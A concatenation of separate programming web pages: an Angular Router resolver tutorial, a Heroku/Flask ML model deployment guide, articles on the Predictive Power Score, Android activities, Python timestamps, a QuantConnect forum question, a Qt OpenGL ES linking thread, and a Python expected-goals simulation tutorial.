browser to, PageNotFoundComponent is displayed. Notice that the wildcard route must be the last route in our routing configuration for it to work as expected. When Angular Router matches a request URL to the router configuration, it stops processing as soon as it finds the first match. So if we were to change the order of the routes to this: const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: '**', component: PageNotFoundComponent }, { path: 'todos', component: AppComponent } ]; then todos would never be reached and PageNotFoundComponent would be displayed because the wildcard route would be matched first. We have already done a lot, so let’s quickly recap what we have accomplished so far: - we set up Angular Router - we created the routing configuration for our application - we refactored AppComponentto TodosComponent - we added <router-outlet></router-outlet>to AppComponent’s template - we added a wildcard route to handle unmatched URLs gracefully. Next, we will create a resolver to fetch the existing todos from our back-end API using Angular Router. Resolving Data using Angular Router In the part 3 of this series we already learned how to fetch data from our back-end API using the Angular HTTP service. Currently, when we navigate our browser to the todos URL, the following happens: - Angular Router matches the todosURL - Angular Router activates the TodosComponent - Angular Router places the TodosComponentnext to <router-outlet></router-outlet>in the DOM - The TodosComponentis displayed in the browser with an empty array of todos - The todos are fetched from the API in the ngOnInithandler of the TodosComponent - The TodosComponentis updated in the browser with the todos fetched from the API. If loading the todos in step 5 takes three seconds, the user will be presented with an empty todo list for three seconds before the actual todos are displayed in step 6. If the TodosComponent were to have the following HTML in its template: <div * You currently do not have any todos yet. </div> then the user would see this message for three seconds before the actual todos are displayed, which could totally mislead the user and cause the user to navigate away before the actual data comes in. We could add a loader to TodosComponent that shows a spinner while the data is being loaded, but sometimes we may not have control over the actual component, for example when we use a third-party component. To fix this unwanted behavior, we need the following to happen: - Angular Router matches the todosURL - Angular Router fetches the todos from the API - Angular Router activates the TodosComponent - Angular Router places the TodosComponentnext to <router-outlet></router-outlet>in the DOM - The TodosComponentis displayed in the browser with the todos fetched from the API. Here, the TodosComponent is not displayed until the data from our API back end is available. That is exactly what a resolver can do for us. To let Angular Router resolve the todos before it activates the TodosComponent, we must do two things: - create a TodosResolverthat fetches the todos from the API - tell Angular Router to use the TodosResolverto fetch the todos when activating the TodosComponentin the todosroute. By attaching a resolver to the todos route we ask Angular Router to resolve the data first, before TodosComponent is activated. So let’s create a resolver to fetch our todos. Creating TodosResolver Angular CLI does not have a command to generate a resolver, so let’s create a new file src/todos.resolver.ts manually and add the following code: import { Injectable } from '@angular/core'; import { ActivatedRouteSnapshot, Resolve, RouterStateSnapshot } from '@angular/router'; import { Observable } from 'rxjs/Observable'; import { Todo } from './todo'; import { TodoDataService } from './todo-data.service'; @Injectable() export class TodosResolver implements Resolve<Observable<Todo[]>> { constructor( private todoDataService: TodoDataService ) { } public resolve( route: ActivatedRouteSnapshot, state: RouterStateSnapshot ): Observable<Todo[]> { return this.todoDataService.getAllTodos(); } } We define the resolver as a class that implements the Resolve interface. The Resolve interface is optional, but lets our TypeScript IDE or compiler ensure that we implement the class correctly by requiring us to implement a resolve() method. When Angular Router needs to resolve data using a resolver, it calls the resolver’s resolve() method and expects the resolve() method to return a value, a promise, or an observable. If the resolve() method returns a promise or an observable Angular Router will wait for the promise or observable to complete before it activates the route’s component. When calling the resolve() method, Angular Router conveniently passes in the activated route snapshot and the router state snapshot to provide us with access to data (such as route parameters or query parameters) we may need to resolve the data. The code for TodosResolver is very concise because we already have a TodoDataService that handles all communication with our API back end. We inject TodoDataService in the constructor and use its getAllTodos() method to fetch all todos in the resolve() method. The resolve method returns an observable of the type Todo[], so Angular Router will wait for the observable to complete before the route’s component is activated. Now that we have our resolver, let’s configure Angular Router to use it. Resolving todos via the router To make Angular Router use a resolver, we must attach it to a route in our route configuration. Let’s open up src/app-routing.module.ts and add our TodosResolver to the todos route: import { NgModule } from '@angular/core'; import { RouterModule, Routes } from '@angular/router'; import { PageNotFoundComponent } from './page-not-found/page-not-found.component'; import { TodosComponent } from './todos/todos.component'; import { TodosResolver } from './todos.resolver'; const routes: Routes = [ { path: '', redirectTo: 'todos', pathMatch: 'full' }, { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } }, { path: '**', component: PageNotFoundComponent } ]; @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [ TodosResolver ] }) export class AppRoutingModule { } We import TodosResolver: import { TodosResolver } from './todos.resolver'; Also add it as a resolver the the todos route: { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } } This tells Angular Router to resolve data using TodosResolver and assign the resolver’s return value as todos in the route’s data. A route’s data can be accessed from the ActivatedRoute or ActivatedRouteSnapshot, which we will see in the next section. You can add static data directly to a route’s data using the data property of the route: { path: 'todos', component: TodosComponent, data: { title: 'Example of static route data' } } You can also add dynamic data using a resolver specified in the the resolve property of the route: resolve: { path: 'todos', component: TodosComponent, resolve: { todos: TodosResolver } } You could also do both at the same time: resolve: { path: 'todos', component: TodosComponent, data: { title: 'Example of static route data' } resolve: { todos: TodosResolver } } As soon as the resolvers from the resolve property are resolved, their values are merged with the static data from the data property and all data is made available as the route’s data. Angular Router uses Angular dependency injection to access resolvers, so we have to make sure we register TodosResolver with Angular’s dependency injection system by adding it to the providers property in AppRoutingModule’s @NgModule metadata: @NgModule({ imports: [RouterModule.forRoot(routes)], exports: [RouterModule], providers: [ TodosResolver ] }) export class AppRoutingModule { } When you navigate your browser to, Angular Router now: - redirects the URL from /to /todos - sees that the todosroute has TodosResolverdefined in its resolveproperty - runs the resolve()method from TodosResolver, waits for the result and assigns the result to todosin the route’s data - activates TodosComponent. If you open up the network tab of your developer tools, you’ll see that the todos are now fetched twice from the API. Once by Angular Router and once by the ngOnInit handler in TodosComponent. So Angular Router already fetches the todos from the API, but TodosComponent still uses its own internal logic to load the todos. In the next section, we’ll update TodosComponent to use the data resolved by Angular Router. Using resolved data Let’s open up app/src/todos/todos.component.ts. The ngOnInit() handler currently fetches the todos directly from the API: public ngOnInit() { this.todoDataService .getAllTodos() .subscribe( (todos) => { this.todos = todos; } ); } Now that Angular Router fetches the todos using TodosResolver, we want to fetch the todos in TodosComponent from the route data instead of the API. To access the route data, we must import ActivatedRoute from @angular/router: import { ActivatedRoute } from '@angular/router'; and use Angular dependency injection to get a handle of the activated route: constructor( private todoDataService: TodoDataService, private route: ActivatedRoute ) { } Finally, we update the ngOnInit() handler to get the todos from the route data instead of the API: public ngOnInit() { this.route.data .map((data) => data['todos']) .subscribe( (todos) => { this.todos = todos; } ); } The ActivatedRoute exposes the route data as an observable, so our code barely changes. We replace this.todoDataService.getAllTodos() with this.route.data.map((data) => data['todos']) and all the rest of the code remains unchanged. If you navigate your browser to localhost:4200 and open up the network tab, you’ll no longer see two HTTP requests fetching the todos from the API. Mission accomplished! We’ve successfully integrated Angular Router in our application! Before we wrap up, let’s run our unit tests: ng serve One unit test fails: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED 'app-todo-list-header' is not a known element When TodosComponent is tested, the testbed is not aware of TodoListHeaderComponent and thus Angular complains that it doesn’t know the app-todo-list-header element. To fix this error, let’s open up app/src/todos/todos.component.spec.ts and add NO_ERRORS_SCHEMA to the TestBed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ] }) .compileComponents(); })); Now Karma shows another error: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED No provider for ApiService! Let’s add the necessary providers to the test bed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ], providers: [ TodoDataService, { provide: ApiService, useClass: ApiMockService } ], }) .compileComponents(); })); This again raises another error: Executed 11 of 11 (1 FAILED) TodosComponent should create FAILED No provider for ActivatedRoute!! Let’s add one more provider for ActivatedRoute to the testbed options: beforeEach(async(() => { TestBed.configureTestingModule({ declarations: [TodosComponent], schemas: [ NO_ERRORS_SCHEMA ], providers: [ TodoDataService, { provide: ApiService, useClass: ApiMockService }, { provide: ActivatedRoute, useValue: { data: Observable.of({ todos: [] }) } } ], }) .compileComponents(); })); We assign the provider for ActivatedRoute a mock object that contains an observable data property to expose a test value for todos. Now the unit tests successfully pass: Executed 11 of 11 SUCCESS Fabulous! To deploy our application to a production environment, we can now run: ng build --aot --environment prod We upload the generated dist directory to our hosting server. How sweet is that? We’ve covered a lot in this article, so let’s recap what we have learned. Summary In the first article, we learned how to: - initialize our Todo application using Angular CLI - create a Todoclass to represent individual todos - create a TodoDataServiceservice to create, update and remove todos - use the AppComponentcomponent to display the user interface - deploy our application to GitHub pages In the second article, we refactored AppComponent to delegate most of its work to: - a TodoListComponentto display a list of todos - a TodoListItemComponentto display a single todo - a TodoListHeaderComponentto create a new todo - a TodoListFooterComponentto show how many todos are left. In the third article, we learned how. In this fourth article, we learned: - why an application may need routing - what a JavaScript router is - what Angular Router is, how it works and what it can do for you - how to set up Angular Router and configure routes for our application - how to tell Angular Router where to place components in the DOM - how to gracefully handle unknown URLs - how to use a resolver to let Angular Router resolve data. All code from this article is available at GitHub. In part five, we’ll implement authentication to prevent unauthorized access to our application. So stay tuned for more and, as always, feel free to leave your thoughts and questions in the comments! Recommended Courses Get practical advice to start your career in programming! Master complex transitions, transformations and animations in CSS!
https://www.sitepoint.com/component-routing-angular-router/
CC-MAIN-2021-04
en
refinedweb
Machine learning is a continuous process that involves Data extraction, cleaning, picking important features, model building, validation, and deployment to test out the model on unseen data. While the initial data engineering and model building phase is fairly a tedious process and requires a lot of time to be spent with Data, model deployment may seem simple, but it is a critical process and depends on the use case you want to target. You can cater the model to mobile users, websites, smart devices, or through any other IoT device. One can choose to integrate the model in the main application, include it in SDLC, or the cloud. There are various strategies to deploy and run the model in the cloud platform, which seems a better option for most of the cases because of the availability of tools such as Google Cloud Platform, Azure, Amazon Web Services, and Heroku. While you can opt to expose the model in Pub/Sub way, API (Application Program Interface) or REST wrapper is more commonly used to deploy the model in production. As the model complexity increases, different teams are assigned to handle such situations commonly known as Machine Learning Engineers. With this much introduction, let’s look at how to deploy a machine learning model as an API on the Heroku platform. What is Heroku? Heroku is a Platform as a service tool that allows developers to host their serverless code. What this means is that one can develop scripts to serve one or the other for specific purposes. The Heroku platform is itself hosted on AWS (Amazon Web Services), which is an infrastructure as a service tool. The Heroku is a free platform but limited to 500hrs uptime. The apps are hosted as a dyno which after inactivity of 30 minutes goes into sleep mode. This ensures that your app is not consuming all the free time during inactivity. The platform supports Ruby, Java, PHP, Python, Node, Go, Scala. Most Data Science beginners refer to this platform to have an experience of running and deploying a model in the cloud. Preparing the Model Now that you are aware of this platform, let’s prepare the model for the same. When a machine learning model is trained, the corresponding parameters are stored in the memory itself. This model needs to be exported in a separate file so we can directly load this model, pass unseen data, and get the outputs. Different model formats are usually practiced such as Pickle, job-lib which converts the Python Object Model into a bitstream, ONNX, PMML, or MOJO which is an H20.ai export format and offers the model to be integrated into Java applications too. For simplicity, consider that we want to export the model via pickle then you can do it by: import pickle Pkl_Filename = “model.pkl” with open(Pkl_Filename, ‘wb’) as file: pickle.dump(model_name, file) The model is now stored in a separate file and ready to be used in integrated into an API. The Server logic For providing access to this model for predictions, we need a server code that can redirect and handle all client-side requests. Python supports web development frameworks and a famous one is Flask. It is a minimalistic framework that allows to set up a server with few lines of code. As it is a minimal package, a lot of functionalities such as authentication and RESTful nature are not explicitly supported. These can be integrated with extensions. Another option is to opt for the newly released framework FastAPI. It is much faster, scalable, well documented, and comes with a lot of integrated packages. For now, let’s continue with the flask to set up a simple prediction route. from flask import Flask import pickle app = Flask(__name__) with open(Filename, ‘rb’) as file: model = pickle.load(file) @app.route(‘/predict’, methods = [‘GET’, ‘POST’]) def pred(): # implement the logic to get parameters either through query or payload prediction = model.predict([parameters obtained]) return {‘result’: prediction} This is a rough code to show how to proceed with the server logic. There are various strategies you can opt for better implementation. Setting up Deployment Files Heroku requires a list of all dependencies required by our application. This is called the requirements file. It is a text file listing all the external libraries the application uses. In this example, the file contents would contain: flask sklearn numpy </p> pandas gunicorn The last library, gunicorn allows us to set up the WSGI server implementation that forms the interface for the client and the server handling the HTTP traffic. Heroku also demands another file known as Procfile that is used to specify the entry point of the app. Consider that the server logic file is saved by the name main.py, then the command to be put in this file is: web: gunicorn main:app “web” is the type of dyno we are deploying, “gunicorn” act as the mediator to pass the request to the server code “main” and search for “app” in “main”. The app handles all the routes here. Final Deployment All the preparations are done, and now it’s time to run the app in the cloud. Create an account if not on the Heroku, click on create an app, choose any region. After that connect your GitHub account, and choose the repo that contains these files: server code, model.pkl, requirements.txt, and Procfile. After this simply hit deploy branch! If it’s successful, then visit the link generated and your app should be live. Now you can make requests to appname.herokuapp.com/predict route and it should give out the predictions. Learn more about machine learning models. Conclusion This was an introduction to what is Heroku, why it is required, and how to deploy a model with the help of Flask. There are a lot of hosting platforms that offer more advanced features such as Data Pipelines, streaming, but Heroku being the free platform is still a good choice for beginners who just want to have a taste of deployment..
https://www.upgrad.com/blog/deploying-machine-learning-models-on-heroku/
CC-MAIN-2021-04
en
refinedweb
Predictive Power Score works similar to the coefficient of correlation but has some additional functionalities which make it more relevant. The strength of a linear relationship between two quantitative variables can be measured using Correlation. The strength of a linear relationship between two quantitative variables can be measured using Correlation. It is a statistical method that is very easy in order to calculate and to interpret. It is generally represented by ‘r’ known as the coefficient of correlation. This is the reason why it is highly misused by professionals because correlation cannot be termed for causation. It is not necessary that if two variables have a correlation then one is dependent on the other and similarly if there is no correlation between two variables it is possible that they might have some relation. This is where PPS(Predictive Power Score) comes into the role. Predictive Power Score works similar to the coefficient of correlation but has some additional functionalities like: In this article, we will explore how we can use the Predictive Power Score to replace correlation. PPS is an open-source python library so we will install it like any other python library using pip install ppscore. We will import ppscore along with pandas to load a dataset that we will work on. import ppscore as pps import pandas as pd We will be using different datasets to explore different functionalities of PPS. We will first import an advertising dataset of an MNC which contains the target variable as ‘Sales’ and features like ‘TV’, ‘Radio’, etc. df = pd.read_csv(‘advertising.csv’) df.head() We will use some basic functions defined in ppscore. PP Score lies between 0(No Predictive Power) to 1(perfect predictive power), in this step we will find PPScore/Relationship between the target variable and the featured variable in the given dataset. pps.score(df, "Sales", "TV") developers corner coefficient of correlation correlation analysis dependency heatmap linear regression replace correlation visualization In this article, we will analyse a business problem with linear regression in a step by step manner and try to interpret the statistical terms at each step to understand its inner workings. Correlation is a statistical measure that indicates the extent to which two or more variables fluctuate together. Positive Correlation indicates the extent to which those variable increase. Machine learning algorithms are not your regular algorithms that we may be used to because they are often described by a combination of some complex statistics and mathematics.
https://morioh.com/p/57c1753e1aac
CC-MAIN-2021-04
en
refinedweb
activities, fragments, and events Embed Size (px) DESCRIPTIONAn overview of the role activities, fragments and intents play in Android app development. TRANSCRIPT - 1. Activities, Fragments, and Events CPTR322: Mobile Application Development Henry Osborne 2. Topics Covered The life cycle of an activity Customizing the UI using fragments Applying styles and themes to activities Displaying activities as dialog windows Understanding the concept of intents Linking activities using intent objects Displaying alerts using notifications 3. Understanding Activities 4. What are activities? A window that contains the UI of an application An application can have zero or more activities Main purpose is to interact with the user Life Cycle: the stages an activitiy goes through from the moment it appears on the screen to the moment its hidden. 5. Creating Activities To create an activity, a Java class that extends the Activity base class is created. import android.app.Activity; public class Activity101Activity extends Activity { } The activity class loads it UI component using the XML file defined in the res/layout folder. 6. Declaring Activities Each activity in the application, must be declared in the AndroidManifest.xml file. 7. onStop() Called when the activity is no longer visible onDestroy() Called before the activity is destroyed by the system onRestart() Called when the activity has been stopped and is restarting 8. Figure 1: Activity Life cycle 9. Applying Styles and Themes 10. Applying Dialog Theme 11. Hiding Activity Title import android.view.Window; public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); requestWindowFeature(Window.FEATURE_NO_TITLE); setContentView(R.layout.main); } 12. Linking Activities Using Intents 13. Fragments 14.(). 15. Figure 2: An example of how two UI modules defined by fragments can be combined into one activity for a tablet design, but separated for a handset design. 16. Adding Fragments Dynamically It is more useful if fragments are created and added to activites during runtime. Allows for a customizable UI E.g. If the application is running on a smartphone, you might fill the activity with a single fragment; if the activity is running on a tablet, you might then fill the activity with two or more fragments. 17.. 18. Figure 3. The lifecycle of a fragment (while its activity is running). 19. Displaying Notifications 20. For important messages the NotificationManager is used to display a persistent message at the top of the device (commonly known as the status bar, sometimes referred to as the notification bar) 21. Activities, Fragments, and Events Recommended
https://vdocuments.site/activities-fragments-and-events.html
CC-MAIN-2021-04
en
refinedweb
It's pretty common to store date and time as a timestamp in a database. A Unix timestamp is the number of seconds between a particular date and January 1, 1970 at UTC. Example 1: Python timestamp to datetime from datetime import datetime timestamp = 1545730073 dt_object = datetime.fromtimestamp(timestamp) print("dt_object =", dt_object) print("type(dt_object) =", type(dt_object)) When you run the program, the output will be: dt_object = 2018-12-25 09:27:53 type(dt_object) = <class 'datetime.datetime'> Here, we have imported datetime class from the datetime module. Then, we used datetime.fromtimestamp() classmethod which returns the local date and time (datetime object). This object is stored in dt_object variable. Note: You can easily create a string representing date and time from a datetime object using strftime() method. Example 2: Python datetime to timestamp You can get timestamp from a datetime object using datetime.timestamp() method. from datetime import datetime # current date and time now = datetime.now() timestamp = datetime.timestamp(now) print("timestamp =", timestamp)
https://www.programiz.com/python-programming/datetime/timestamp-datetime
CC-MAIN-2021-04
en
refinedweb
Reliable integer root function? Does Sage have an integer_root(x, n) function which reliable (!) returns floor(root(x,n)) for n-th roots? I think that it should be offered as a Sage function if not. This seems to work: def integer_root(x, n): return gp('sqrtnint(%d,%d)' %(x,n)) Integer n-th root of x, where x is non-negative integer. // Related: question 10730. Edit: The answer of castor below shows a second way to define such a function: def integer_root(x, n): return ZZ(x).nth_root(n, truncate_mode=1)[0] Which version will be faster? This exists at least for square roots: it is called sqrtrem()and also provides the remainder.
https://ask.sagemath.org/question/30375/reliable-integer-root-function/?sort=votes
CC-MAIN-2021-04
en
refinedweb
Important: Please read the Qt Code of Conduct - [Solved] Qt and ANGLE woes Hi guys, I'm trying to combine qt with some direct opengl functions on windows. The project compiles fine but when it comes to linking I get all the __imp_glblablabla errors. Now when on other platforms I can just link in the opengl library and it runs fine I want to do this on windows with the standard packaged ANGLE version. I could link in libangle I'm guessing but I'm sure qt has a better way of doing this? Any tips? Kind Regards, Martell Malone Edit: forgot to mention I'm on qt5 and I'm using gles functions - sierdzio Moderators last edited by Compile Qt5 yourself with "-desktop opengl" flag passed to configure. This way Angle will not be used at all (but you need to ensure users will have OpenGL driver installed). Hi sierdzio, I've done that already but I'm using GLES functions so I'll have o change up the code. The problem here is that I want it to use ANGLE. I was just wondering if qt5 exposes opengl functions to us. The headers are there but link time is where the errors occur. The reason being is that I'm creating a qt version of the cococs2d-x game engine with directx for windows I had a look at qgl.h and qglinked.h in quake3 but couldnt get that to work "" here is my header atm @ #ifndef CCGL_H #define CCGL; #endif // CCGL_H @ here is a typical error I receive. note that this is not on compiling the cocoslib itself but when linking it to an exe( eg. a game) cocos2dx.lib(CCTexturePVR.cpp.obj) : error LNK2019: unresolved external symbol _ _imp__glGetError@0 referenced in function "private: bool __thiscall cocos2d::CCT exturePVR::createGLTexture(void)" (?createGLTexture@CCTexturePVR@cocos2d@@AAE_NX Z) also I noticed this as I had a opengl glew version of this header but I don't know if it is relevant although it does say it exposes opengl functions Many Thanks Martell Malone Sorry if I'm being dumb. You said you compiled Qt using -opengl desktop but then you go on to say that you wish to use ANGLE. Which do you want to use? - sierdzio Moderators last edited by "ZapB": is maintainer for OpenGL stuff, IIRC. Please ping him (hope he does not mind), I'm not using OpenGL directly in my projects, so I can't help much more. Edit seems I was a tad too late ;) Sorry Zap about the confusion. I want to use angle. I first tried compiling qt with -opengl desktop but then it wont compile because I'm using GLES headers I then changed the header to the opengl version of cocos which requires glew. I then got a load of redefine errors which you probably have seen before. So the best solution for me is to use ANGLE for now until qt makes including glew unnecessary. On that note... Is there a define I can use to detect if angle is being used? #ifdef USING_ANGLE or something of that sort? That way at a later point I can support both versions. Hope that makes sense :) Thanks sierdzio I sent him a pm earlier :) OK then. First thing, forget about the existence of ANGLE ;) It's an implementation detail in this case. What you are really saying is that you want to use OpenGL ES 2. You can just use the pre-compiled release packages for Qt5 in this case. No need to build your own. To be able to use OpenGL ES 2 functions just #include <qopengl.h> and if that doesn't get you access to them you can get a pointer to a QOpenGLFunctions object from the QOpenGLContext::functions() function. This object contains member functions for the remainder of the ES 2 functions - well I think it catches them all. To answer yoru other question about a #define to conditionally compile code you need something like: @ #include <qopengl.h> #ifdef QT_OPENGL #ifdef QT_OPENGL_ES_2 // OpenGL ES 2 code goes here #else // Desktop OpenGL code goes here #endif #endif @ By the way, the gerrit patch you linked to above can still be applied cleanly on top of the Qt 5.0.0 release (I think). I will be pushing a new version of that patch series soon (maybe this weekend if I get time between kids and decorating) ;) Hope this helps! Man you guys at the qt are fast to reply. :) Thanks ZapB this should get me back on the road to a linked library xD Ill post back if I run into any other qt related issues. Hopefully something like this should work. @ #ifndef CCGL_H #define CCGL_H #include <qopengl.h> #ifdef QT_OPENGL #ifdef QT_OPENGL_ES #ifdef Q_OS_SYMBIAN #define GL_DEPTH24_STENCIL8_OES 0x88F0 #endif ; #else #define CC_GL_DEPTH24_STENCIL8 GL_DEPTH24_STENCIL8 #define ccglOrtho glOrtho #define ccglClearDepth glClearDepth #define ccglTranslate glTranslated #define ccglGenerateMipmap glGenerateMipmap #define ccglGenFramebuffers glGenFramebuffers #define ccglBindFramebuffer glBindFramebuffer #define ccglFramebufferTexture2D glFramebufferTexture2D #define ccglDeleteFramebuffers glDeleteFramebuffers #define ccglCheckFramebufferStatus glCheckFramebufferStatus #define ccglFrustum glFrustum #define ccglGenBuffers glGenBuffers #define ccglBindBuffer glBindBuffer #define ccglBufferData glBufferData #define ccglBufferSubData glBufferSubData #define ccglDeleteBuffers glDeleteBuffers #define ccglglPointSizePointer glPointSizePointer #define CC_GL_FRAMEBUFFER GL_FRAMEBUFFER #define CC_GL_FRAMEBUFFER_BINDING GL_FRAMEBUFFER_BINDING #define CC_GL_COLOR_ATTACHMENT0 GL_COLOR_ATTACHMENT0 #define CC_GL_FRAMEBUFFER_COMPLETE GL_FRAMEBUFFER_COMPLETE #define CC_GL_POINT_SPRITE GL_POINT_SPRITE_ARB #define CC_GL_COORD_REPLACE GL_COORD_REPLACE_ARB #define CC_GL_POINT_SIZE_ARRAY GL_POINT_SIZE #include <GL/glew.h> #ifdef _WIN32 #include <GL/wglew.h> #else #include <GL/glxew.h> #endif #endif #endif #endif // CCGL_H @ You're welcome. Please note that #include <qopengl.h> already takes care of including the GLES/* headers and typdef'ing GLchar etc. for you. Open up the header to see the hoops we jump through to be nice to you guys ;) Good luck and happy hacking! Hi Zap funnily enough I just noticed that earlier. :) Unfortunately I still have link time errors. :/ here is the implementation of the class CCTexturePVR which is in the last error in the compile log. it calls glGetError Question do I have to inherit some qt class to use opengl functions? That would be a very dirty way of implementing it Hmm weird. From the linker command and errors that you pasted it looks like your application/lib is not linking against libEGL.dll or libGLES2.dll which should be provided by ANGLE. Do these libraries exist under your Qt installation? Does your Makefile mention them? I notice you're using CMake and ninja. It could well be a build system issue. In cmake I have. find_package(Qt5Widgets REQUIRED) find_package(Qt5Gui REQUIRED) find_package(Qt5Core REQUIRED) find_package(Qt5OpenGL REQUIRED) set(EXTERNAL_LIBS ${Qt5Widgets_LIBRARIES} ${Qt5Gui_LIBRARIES} ${Qt5Core_LIBRARIES} ${Qt5OpenGL_LIBRARIES} Qt5OpenGL_LIBRARIES only appears as Qt5::Opengl I dont know how to link in libEGL or libGLES2. I dont want to do it the dirty way :) they are both in qtbase/lib are the referenced in the cmake modules of qt? EDIT: Actually I'll do the work for this myself. I'll create another issue if I cant solve it because cmake probably isn't your problem to deal with. and I'm basically asking you to hold my hand at this stage lol Thanks again dude I think I will have it built shortly :)
https://forum.qt.io/topic/23125/solved-qt-and-angle-woes
CC-MAIN-2021-04
en
refinedweb
Hi, I am new to python and Quantconnect. I got soem questions in my development project. First, I wonder whether we can divide two equities in directly in Initializer. Second, it is possible to calculate the SMA of the ratio by using self.SMA(self.ratio, .....) Thank you. Below is the code class SMATrendAlgo(QCAlgorithm): def Initialize(self): self.period = 20 self.SetStartDate(2010, 01, 01) #Set Start Date self.SetEndDate(2015, 01, 01) #Set End Date self.SetCash(100000) #Set Strategy Cash self.spy = self.AddEquity("SPY", Resolution.Daily).value self.tlt = self.AddEquity("TLT", Resolution.Daily).value self.ratio = self.spy/self.tlt self.sma20 = self.SMA(self.ratio, 20, Resolution.Daily)
https://www.quantconnect.com/forum/discussion/2975/sma-and-ratio-python/
CC-MAIN-2018-51
en
refinedweb
Creating random numbers is a central part of programming – whether it is for simulations, games or models, there are a multitude of uses for random numbers. Python’s Random module makes creating pseudo-random numbers incredibly simple. This article runs through the basic commands to create a random number, then looks to apply this to finding how likely you are to win based on a match’s expected goals (we’ll come on to what these are later). Let’s import the random module and get started. import random The easiest way to get a random number is through the ‘.random()’ operation. This will give a random number between 0 and 1. Check it out: random.random() 0.10769078951918487 A number between 0 and 1 is very useful. Essentially, it gives us a percentage that we can use to calculate chance, or to assign to a variable for calculation. Additionally, we can use it to create a random whole number by multiplying it by the maximum possible value, then rounding with ‘int()’. The example here gives us a random number between 0 and 100: int(random.random()*100) 88 Alternatively to the above, we could use another feature of the Random module to create a random whole number for us – ‘.randint()’. We simply pass the highest and lowest possible values (inclusive) that we will allow. Let’s simulate a dice roll: random.randint(1,6) 2 Applying Random to Expected Goals Great job on getting to know Random. The rest of the article applies it to expected goals, and will allow us to calculate how ‘lucky’ a team was based on the quality of their shots. Firstly, expected goals is a measurement of how many goals a team could have expected to score based on the shots that they took. Different models base this on different things, but most commonly, the location of the shot, type of build-up, foot used are used to compare the chance with similar ones historically. We can then see the percentage chance of the shot becoming a goal. Knowing the expected goals, we can then use ‘.random()’ to test how likely that score was. Let’s set up our lists of shots with their expected goal values – these are all percentages represented as decimals. HomexG = [0.21,0.66,0.1,0.14,0.01] AwayxG = [0.04,0.06,0.01,0.04,0.06,0.12,0.01,0.06] The first shot for the home team had a 21% chance of being scored. Let’s create a random percentage to simulate if it goes in or not. If it is equal or less than 21%, we can say that it is scored in our simulation: if random.random()<=0.21: print("GOAL!") else: print("Missed!") Missed! As happens roughly 4 out of 5 times, this time the shot was missed. Let’s run the shot 10,000 times: Goals = 0 for i in range(0,10000): if random.random()<=0.21: Goals += 1 print(Goals) 2071 So according to the xG score and our random test, if we take that shot 10,000 times, we can expect 2075 goals (pretty much in line with the 0.21 score). In a nutshell, this is how we simulate with random numbers. Going Further: Simulating a Match with Expected Goals Rather than simulate with one number, let’s apply this same test to every shot by the home and away teams. Take a look through the function below and try to understand how it applies the test above to every shot in the HomexG and AwayxG lists. def calculateWinner(home, away): #Our match starts at 0-0 HomeGoals = 0 AwayGoals = 0 #We have a function within our function #This one runs the '.random()' test above for a list def testShots(shots): #Start goal count at 0 Goals = 0 #For each shot, if it goes in, add a goal for shot in shots: if random.random() <= shot: Goals += 1 #Finally, return the number of goals return Goals #Run the above formula for home and away lists HomeGoals = testShots(home) AwayGoals = testShots(away) #Return the score if HomeGoals > AwayGoals: print("Home Wins! {} - {}".format(HomeGoals, AwayGoals)) elif AwayGoals > HomeGoals: print("Away Wins! {} - {}".format(HomeGoals, AwayGoals)) else: print("Share of the points! {} - {}".format(HomeGoals, AwayGoals)) calculateWinner(HomexG, AwayxG) Home Wins! 1 - 0 We are now simulating a whole game based on expected goals, pretty cool! However, we are only simulating once. In order to get a proper estimate as to how likely it is that one team wins, we need to do this lots of times. Let’s change our last function to simply return the result, not a user-friendly print out. We can then use this function over and over to calculate an accurate percentage chance of winning for each team. def calculateWinner(home, away): HomeGoals = 0 AwayGoals = 0 def testShots(shots): Goals = 0 for shot in shots: if random.random() <= shot: Goals += 1 return Goals HomeGoals = testShots(home) AwayGoals = testShots(away) #This is all that changes from above #We now pass a simple string, rather than ask for a print out. if HomeGoals > AwayGoals: return("home") elif AwayGoals > HomeGoals: return("away") else: return("draw") Now, let’s run this function 10000 times, and work out the percentage of each result: #Run xG calculator 10000 times to test winner % def calculateChance(team1, team2): home = 0; away = 0; draw = 0; for i in range(0,10000): matchWinner = calculateWinner(team1,team2) if matchWinner == "home": home +=1 elif matchWinner == "away": away +=1 else: draw +=1 home = home/100 away = away/100 draw = draw/100 print("Over 10000 games, home wins {}%, away wins {}% and there is a draw in {}% of games.".format(home, away, draw)) calculateChance(HomexG, AwayxG) Over 10000 games, home wins 60.7%, away wins 10.16% and there is a draw in 29.14% of games. There we go! We now have a better understanding as to what result we could normally expect from these chances! Let’s try a new run of expected goals – one great chance (50%) against 10 poor chances (5%). Who wins most often here? HomexG=[0.5] AwayxG=[0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05,0.05] calculateChance(HomexG, AwayxG) Over 10000 games, home wins 30.84%, away wins 23.14% and there is a draw in 46.02% of games. Interestingly, the big chance team has a 5% advantage over the team that shoots loads from low-chance opportunities. Makes you think! Summary Creating random numbers is easy, whether we want a random percentage or number between 0 and 1 (.random()) or we want a random whole integer (randint()), the random module is a big help. In this article, we saw how we can apply random numbers to a simulation. If anything around the function creation or for loops was confusing here, you might want to take a read up on those. Alternatively, why not push forward with more complex data sets?
http://fcpython.com/python-basics/random-with-xg
CC-MAIN-2018-51
en
refinedweb
